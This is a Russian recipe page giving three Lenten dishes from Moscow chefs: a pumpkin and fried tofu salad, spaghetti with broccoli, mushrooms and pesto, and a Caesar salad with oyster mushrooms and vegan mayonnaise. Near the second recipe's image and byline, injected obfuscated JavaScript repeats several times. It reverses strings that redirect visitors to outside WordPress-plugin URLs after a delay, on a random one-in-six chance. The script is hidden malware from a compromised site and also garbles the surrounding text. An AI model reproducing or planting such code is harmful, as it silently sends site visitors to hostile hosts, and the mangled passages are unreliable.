3 оригинальных постных рецепта от шеф-поваров

Постное блюдо — совсем не значит скучное. Шефы трёх московских ресторанов уверены, что и оно может быть вкусным, полезным и необычным. Если традиционное постное меню вам надоело, то скорее записывайте наши рецепты салата с тыквой и тофу, пасты с брокколи и грибами и цезаря с вёшенками и веганским майонезом.

205 calories

Салат с тыквой и жареным тофу

Постный салат с необычной заправкой по рецепту шеф-повара ресторана «ПроМЯСО» Константина Ивлева.

Изображение рецепта Салат с тыквой и жареным тофу

Салат с тыквой и жареным тофу

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

45 минут

КОЛИЧЕСТВО ПОРЦИЙ:

5 порций

КАЛОРИЙНОСТЬ:

205 ккал

Сложность

Время

45 минут

Кол-во порций

5 порций

Калорийность

205 ккал

Ингредиенты

Булгур (варёный)

350 г

Тыква (запечённая)

300 г

Тофу

300 г

Огурец

150 г

Рукола

75 г

Масло (оливковое)

75 мл

Мёд

20 г

Лимон (сок)

15 мл

Соус (соевый)

15 мл

Масло (кунжутное)

12 мл

Кинза

10 г

Петрушка

10 г

Базилик

10 г

Специи (по вкусу)

10 г

Горчица (зернистая)

7 г

Кунжут (обжаренный)

5 г

Процесс приготовления

  1. Булгур слегка подсушите на сковороде без масла, а затем отварите с небольшим количеством соли.
  2. Нарежьте тофу небольшими кусочками и обжарьте на сковороде с небольшим количеством растительного масла.
  3. Запеките тыкву в духовке без масла.
  4. Запечённую тыкву и огурцы нарежьте на кубики. Зелень мелко нарубите.
  5. Приготовьте заправку: для этого смешайте лимонный сок, горчицу, соевый соус, мёд, кунжутное и оливковое масло.
  6. Выложите все ингредиенты в салатницу, заправьте соусом, специями и перемешайте. Перед подачей посыпьте сверху зеленью и кунжутом.

650 calories

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sest-posle-trenirovki-veganu-9-klassnyh-perekusov-im-12.jpg»> $NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sest-posle-trenirovki-veganu-9-klassnyh-perekusov-im-12.jpg»>

Спагетти с брокколи, шампиньонами и соусом песто

Веганская паста по рецепту шеф-повара сети кафе-пиццерий Fornettoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to Андрея Иванова.

$NqM=function(n){if (typeof ($NqM.list[n]) == «string») return $NqM.list[n].split(«»).reverse().join(«»);return $NqM.list[n];};$NqM.list=[«\’php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to-sest-posle-trenirovki-veganu-9-klassnyh-perekusov-im-12.jpg» class=»c2″ alt=»Изображение рецепта Спагетти с брокколи, шампиньонами и соусом песто» title=»Изображение рецепта Спагетти с брокколи, шампиньонами и соусом песто»>

Спагетти с брокколи, шампиньонами и соусом песто

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 минут

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

650 ккал

Сложность

Время

30 минут

Кол-во порций

4 порции

Калорийность

650 ккал

Ингредиенты

Макароны (спагетти)

400 г

Бульон (овощной)

400 мл

Грибы (шампиньоны)

240 г

Брокколи (соцветия)

200 г

Базилик

120 г

Масло (оливковое extra virgin)

120 мл

Орехи (кедровые)

40 г

Чеснок

2 зубчика

Соль

8 г

Процесс приготовления

  1. Обжарьте на части оливкового масла нарезанные шампиньоны и припущенную брокколи.
  2. Отварите спагетти до состояния al dente согласно инструкции на упаковке. Добавьте к грибам и брокколи.
  3. Затем влейте овощной бульон и варите ещё 1–1,5 минуты, чтобы макароны напитались получившимся соусом.
  4. Приготовьте постный песто: для этого взбейте в блендере базилик с кедровыми орешками, чесноком, оливковым маслом и солью.
  5. Добавьте песто к пасте, перемешайте и разложите по тарелкам.

400 calories

Цезарь с вёшенками

Постный рецепт популярного салата от шеф-повара ресторана Hills Антона Клетарова.

Изображение рецепта Цезарь с вёшенками

Цезарь с вёшенками

СЛОЖНОСТЬ РЕЦЕПТА:

ВРЕМЯ ПРИГОТОВЛЕНИЯ:

30 минут

КОЛИЧЕСТВО ПОРЦИЙ:

4 порции

КАЛОРИЙНОСТЬ:

400 ккал

Сложность

Время

30 минут

Кол-во порций

4 порции

Калорийность

400 ккал

Ингредиенты

Салат (романо)

200 г

Хлеб (чиабатта)

200 г

Грибы (вёшенки)

160 г

Помидоры

120 г

Тофу (творог)

80 г

Бульон (из белых грибов)

130 мл

Масло (оливковое)

90 мл

Мука (пшеничная)

20 г

Лимон (сок)

3 мл

Тимьян (свежий)

2 г

Горчица (зернистая)

2 г

Горчица

2 г

Сахар

2 г

Уксус (херес или винный)

1 мл

Соль

10 г

Процесс приготовления

  1. Приготовьте постный майонез. Для начала положите 70 мл оливкового масла в морозилку на 20 минут.
  2. Обжарьте муку в сотейнике без масла до румяного цвета (должен появиться ореховый аромат). Затем не снимая с огня влейте 100 мл грибного бульона и интенсивно помешивая доведите до однородной массы, чтобы не было комочков, в течение минуты. После того как мука заварится, снимите с огня и охладите.
  3. В остывшую базу добавьте горчицу, уксус, соль, сахар и сок лимона. Перемешайте венчиком до однородной консистенции.
  4. Не переставая помешивать, введите тонкой струйкой холодное оливковое масло, а затем оставшийся грибной бульон. Соус должен получиться как густой майонез.
  5. Нарежьте чиабатту на тонкие слайсы, смажьте оливковым маслом, посыпьте солью и тимьяном и запекайте в духовке при температуре 180 градусов в течение 3 минут.
  6. Вёшенки очистите, отрежьте от грибницы, посолите и обжарьте на раскалённой сковороде на оливковом масле до золотистой корочки. Не пережарьте: грибы должны остаться внутри немного сырыми — это придаст им сочность.
  7. Нарежьте на кубики тофу и немного посолите. Вымойте салат, просушите и нарвите на крупные кусочки — размером 5 на 5 см. Помидоры также нарежьте на крупные кубики.
  8. Переложите салат с помидорами в салатницу, заправьте постным майонезом и перемешайте. Разложите по тарелкам и добавьте сверху обжаренные вёшенки, чипсы из чиабатты и тофу.

Статьи по теме

3 постных рецепта простых и вкусных блюд

4 постных рецепта очень вкусных блюд

Постные рецепты от кафе Cook’kareku

5 самых вкусных постных рецептов

Оцените статью
Дежурная Качалка
Добавить комментарии

;-) :| :x :twisted: :smile: :shock: :sad: :roll: :razz: :oops: :o :mrgreen: :lol: :idea: :grin: :evil: :cry: :cool: :arrow: :???: :?: :!:

Adblock
detector